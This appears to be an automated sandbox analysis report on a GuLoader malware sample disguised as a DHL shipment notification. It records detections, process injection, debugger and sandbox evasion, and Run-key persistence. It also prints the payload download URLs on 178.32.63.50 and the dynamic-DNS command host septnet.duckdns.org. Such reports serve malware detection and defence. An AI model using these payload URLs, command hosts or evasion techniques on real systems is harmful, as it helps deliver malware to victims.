Loading ...

Play interactive tourEdit tour

Windows Analysis Report DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Overview

General Information

Sample Name:DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Analysis ID:1360
MD5:8e2b177d2ab29c95f067559a029cf5e8
SHA1:f347fa229d51836344ab5bf89fa531e19aa5e324
SHA256:b9fdde7d748e27a130c509a589a2c8b92aad279604d3e4ee7ac28187fc5660be
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeVirustotal: Detection: 31%Perma Link
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeReversingLabs: Detection: 17%
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeAvira: detected
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49806 -> 178.32.63.50:80
    Uses dynamic DNS servicesShow sources
    Source: unknownDNS query: name: septnet.duckdns.org
    Source: Joe Sandbox ViewASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
    Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
    Source: global trafficHTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
    Source: global trafficTCP traffic: 192.168.11.20:49807 -> 193.104.197.28:6577
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: unknownTCP traffic detected without corresponding DNS query: 178.32.63.50
    Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpString found in binary or memory: http://178.32.63.50/boss/Host_AKhLBP62.bin
    Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpString found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin
    Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmpString found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.bin:
    Source: ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmpString found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binF
    Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpString found in binary or memory: http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil
    Source: unknownDNS traffic detected: queries for: septnet.duckdns.org
    Source: global trafficHTTP traffic detected: GET /moss/Host_AKhLBP62.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache

    System Summary:

    barindex
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_00403DD6
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0040415B
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_023018E5
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230C119
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230E165
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230303C
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304419
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304245
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_023042B5
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304484
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230CED6
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_023036D9
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230452C
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02303700
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304358
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02303BBC
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02303BBE
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02302F90
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304195
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02302F9B
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304184
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230DC5F NtProtectVirtualMemory,
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230C119 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02307B69 NtWriteVirtualMemory,
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02307BAC NtWriteVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CED4E NtProtectVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CEC4F Sleep,NtProtectVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CECBD Sleep,NtProtectVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CED49 NtProtectVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CED5C NtProtectVirtualMemory,NtProtectVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CEDB8 NtProtectVirtualMemory,
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 6_2_030CEE3A NtProtectVirtualMemory,
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313749031092.0000000000419000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeBinary or memory string: OriginalFilenameVOLDFRELSERS.exe vs DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeSection loaded: edgegdi.dll
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeVirustotal: Detection: 31%
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeReversingLabs: Detection: 17%
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile created: C:\Users\user\AppData\Local\Temp\LABERTJump to behavior
    Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/1@1/2
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeMutant created: \Sessions\1\BaseNamedObjects\oILYSlqV

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000002.00000002.313750716611.0000000002300000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_00409455 push es; iretd
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_00407E31 push ds; retf
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_004072C1 push edx; retf
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_00406294 push edx; retf
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_00406D73 push es; retf
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_004099EF push esp; iretd
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_00407BFF push FFFFFFA7h; iretd
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02300390 push BDC367A8h; ret
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02307F80 push FFFFFFAFh; ret
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02304F84 push esi; iretd
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7Jump to behavior
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Halvngen7Jump to behavior
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Tries to detect Any.runShow sources
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeFile opened: C:\Program Files\qga\qga.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile opened: C:\Program Files\qga\qga.exe
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
    Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\CIRKUSFORESTILLINGER.EXE\LABERTSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNHALVNGEN7HTTP://178.32.63.50/MOSS/HOST_AKHLBP62.BINHTTP://178.32.63.50/BOSS/HOST_AKHLBP62.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEUSER32PSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=PROGRAMFILES=\INTERNET EXPLORER\IEINSTAL.EXEWINDIR=\SYSWOW64\MSVBVM60.DLL
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880Thread sleep count: 9976 > 30
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe TID: 6880Thread sleep time: -49880s >= -30000s
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread sleep count: Count: 9976 delay: -5
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02303B3F rdtsc
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeWindow / User API: threadDelayed 9976
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeSystem information queried: ModuleInformation
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=ProgramFiles=\internet explorer\ieinstal.exewindir=\syswow64\msvbvm60.dll
    Source: ieinstal.exe, 00000006.00000002.318236722320.00000000031E8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
    Source: ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeuser32psapi.dllMsi.dllPublishershell32advapi32TEMP=\Cirkusforestillinger.exe\LABERTSoftware\Microsoft\Windows\CurrentVersion\RunHalvngen7http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Source: DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000002.00000002.313750631050.00000000022E0000.00000004.00000001.sdmp, ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeThread information set: HideFromDebugger
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02303B3F rdtsc
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02305833 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02305859 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_023088B5 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_023058BF mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230CED6 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230599C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230BDCB mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_02308A19 LdrInitializeThunk,
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230E165 RtlAddVectoredExceptionHandler,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Writes to foreign memory regionsShow sources
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeMemory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30C0000
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 2_2_0230CED6 LoadLibraryA,LogonUserA,
    Source: C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe 'C:\Users\user\Desktop\DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
    Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: ieinstal.exe, 00000006.00000002.318237700383.00000000039C1000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1Windows Management InstrumentationValid Accounts1Valid Accounts1Valid Accounts1OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder1Access Token Manipulation1Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion23Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)DLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion23Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Process Injection112NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptDLL Side-Loading1Obfuscated Files or Information1LSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol112Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe32%VirustotalBrowse
    DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe18%ReversingLabsWin32.Trojan.Mucc
    DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe100%AviraHEUR/AGEN.1141869

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    2.2.DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe.400000.0.unpack100%AviraHEUR/AGEN.1141869Download File
    2.0.DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe.400000.0.unpack100%AviraHEUR/AGEN.1141869Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://178.32.63.50/moss/Host_AKhLBP62.bin0%Avira URL Cloudsafe
    http://178.32.63.50/moss/Host_AKhLBP62.bin:0%Avira URL Cloudsafe
    http://178.32.63.50/moss/Host_AKhLBP62.binF0%Avira URL Cloudsafe
    http://178.32.63.50/boss/Host_AKhLBP62.bin0%Avira URL Cloudsafe
    http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    septnet.duckdns.org
    193.104.197.28
    truetrue
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://178.32.63.50/moss/Host_AKhLBP62.bintrue
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://178.32.63.50/moss/Host_AKhLBP62.bin:ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
